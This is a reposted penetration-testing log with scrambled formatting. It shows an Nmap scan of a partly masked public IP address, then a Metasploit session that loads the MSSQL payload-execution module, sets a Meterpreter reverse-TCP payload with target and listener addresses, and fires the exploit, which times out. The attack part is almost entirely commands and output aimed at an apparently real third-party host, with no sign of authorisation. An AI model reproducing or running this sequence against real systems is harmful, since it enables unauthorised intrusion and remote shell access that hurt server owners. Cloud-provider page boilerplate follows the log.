Penetration notes -2013-07-13 Windows/mssql/mssql_payload

Source: Internet
Author: User
Tags mssql microsoft iis cve mitre

Scan starting Nmap 5.30beta1 (http://nmap.org) at 2011-05-06 09:36 China standard Time nse:loaded scripts for scanning.  Initiating ping scan at 09:36 scanning 203.171.239.* [4 ports] completed ping scan in 09:36, 0.90s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. At 09:36 completed Parallel DNS resolution of 1 host. At 09:36, 0.03s elapsed initiating SYN Stealth Scan at 09:36 scanning 203.171.239.* [ports] discovered open port 3389 /TCP on 203.171.239.* discovered open ports 80/tcp on 203.171.239.* discovered open ports 3306/tcp on 203.171.239.* Discover Ed Open port 21/tcp on 203.171.239.* completed SYN Stealth Scan at 09:36, 33.18s elapsed (+ total ports) initiating Ser Vice scan at 09:36 Scanning 4 services on 203.171.239.* completed Service scan at 09:37, 6.07s elapsed (4 services on 1 ho  ST) Initiating OS Detection (try #1) against 203.171.239.* retrying OS detection (try #2) against 203.171.239.* initiating Traceroute at 09:37 completed Traceroute at 09:37, 0.06s Elapsed initiating Parallel DNS resolution of 1 host. At 09:37 completed Parallel DNS resolution of 1 host. At 09:37, 0.03s elapsed nse:script scanning 203.171.239.*. Nse:starting RunLevel 1 (of 1) scan. Initiating NSE at 09:37 completed NSE at 09:37, 5.22s elapsed nse:script scanning completed. Nmap Scan Report for 203.171.239.* Host was up (0.043s latency). Not shown:994 filtered ports PORT State SERVICE VERSION 21/tcp open ftp Microsoft ftpd 25/tcp closed SMTP 80/tcp open htt P Microsoft IIS httpd |_http-methods:no allow or public header in OPTIONS response (status code) |_html-title:site D OESN ' t has a title (text/html). 110/TCP closed POP3 3306/tcp open mysql mysql 5.1.32-community | Mysql-info:protocol:10 | version:5.1.32-community | Thread id:30457 | Some capabilities:long passwords, Connect with DB, Compress, ODBC, transactions, Secure Connection |  Status:autocommit |_salt:<*[k+0o~o "Target=_blank>[email protected] "; By^j5k<*[k+0o~o3389/tcp Open microsoft-rdp Microsoft Terminal Service Device type:general purpose|media device Running (JUST guessin G): Microsoft Windows 2003| XP (93%), Motorola Windows pocketpc/ce (85%) Aggressive OS guesses:microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Wind oWS XP SP3 (85%), Motorola VIP1216 Digital set top box (Windows CE 5.0) (85%) No exact OS matches for host (test conditions non-ideal). Network distance:1 Hop TCP Sequence prediction:difficulty=262(Good luck!) IP ID Sequence generation:busy Server or unknown class Service Info:OS:Windows TRACEROUTE (using port 25/tcp) HOP RTT A Ddress 1 50.00 ms 203.171.239.* Read data Files From:d:\metasploit\nmap OS and Service detection performed. Incorrect results at http://nmap.org/submit/. Nmap done:1 IP Address (1 host up) scanned in 54.32 seconds Raw packets sent:2095 (95.768KB) | rcvd:251 (223.649KB) Start taking station Welcome to the Metasploit Web console! _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |_|_|_|\____)\___)_|| _(___/| || _/|_|\___/|_|\___) |_| =[ Metasploit V3.4.2-dev [core:3.4 api:1.0] +----=[ 566 exploits-283 Auxiliary +----=[ payloads-27 encoders-8 Nops=[ svn r9834 updated 296 days ago (2010.07.14) warning:this copy of the Metasploit Framework is last updated 296 days a Go. We recommend the framework at least every. For information in updating your copy of Metasploit, please see:http://www.metasploit.com/redmine/projects/framework/ Wiki/updating>> Use windows/mssql/mssql_payload >> info windows/mssql/mssql_payload name:microsoft SQL Server payload Exe  Cution version:9669 platform:windows privileged:no license:metasploit Framework License (BSD) rank:excellent Provided By:david Kennedy "rel1k"<kennedyd013@gmail. com>Jduck<Jduck@metasploit. com> Available targets:id Name------0 Automatic Basic options:name current Setting Required Description---------------- ----------------------PASSWORD no The PASSWORD for the specified username RHOST yes the target address rport 1433 Yes T He target Port USERNAME sa no the USERNAME to authenticate as Usecmdstager true no Wait for user input before returning FR Om exploit VERBOSE false no Enable VERBOSE output Payload information:Description:This module would execute an arbitrary Payload on a Microsoft SQL Server, using the Windows debug.com method for writing a executable to disk and the Xp_cmdshel L Stored procedure. File size restrictions is avoided by incorporating the Debug bypass method presented at Defcon-Securestate. Note that this module would leave a Metasploit payload in the Windows System32 directory which must be manually deleted Onc E The attack is completed. references:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402 http://www.osvdb.org/557 http://www.securityfocus.com/bid/1281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209 http://www.osvdb.org/15757 http ://www.securityfocus.com/bid/4797 http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf >> use Windows/mssql/mssql_payload >> Set Payload windows/meterpreter/reverse_tcp payload = windows/meterpreter/ REVERSE_TCP >> Show Options Module options:name current Setting Required Description--------------------------- -----------PASSWORD No The PASSWORD for the specified username RHOST yes the target address Rport 1433 yes the target por T USERNAME sa no the USERNAME to authenticate as Usecmdstager true no Wait for user input before returning from exploit VE Rbose false No Enable verbose output Payload options (windows/meterpreter/reverse_tcp): Name current Setting Required Desc Ription--------------------------------------exitfunc Process Yes Exit Technique:seh, thread, process lhost Yes Listen address Lport 4444 Yes the listen port EXPLoit target:id Name------0 Automatic >> set RHOST 203.171.239.* RHOST = 203.171.239.* >> Set Lhost 172 .16.2.101 Lhost = 172.16.2.101 >> exploit [*] Started reverse handler on 172.16.2.101:4444 [-] exploit failed:t He connection timed out (203.171.239.*:1433). [*] Exploit completed, but no session is created.

Penetration notes -2013-07-13 windows/mssql/mssql_payload

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.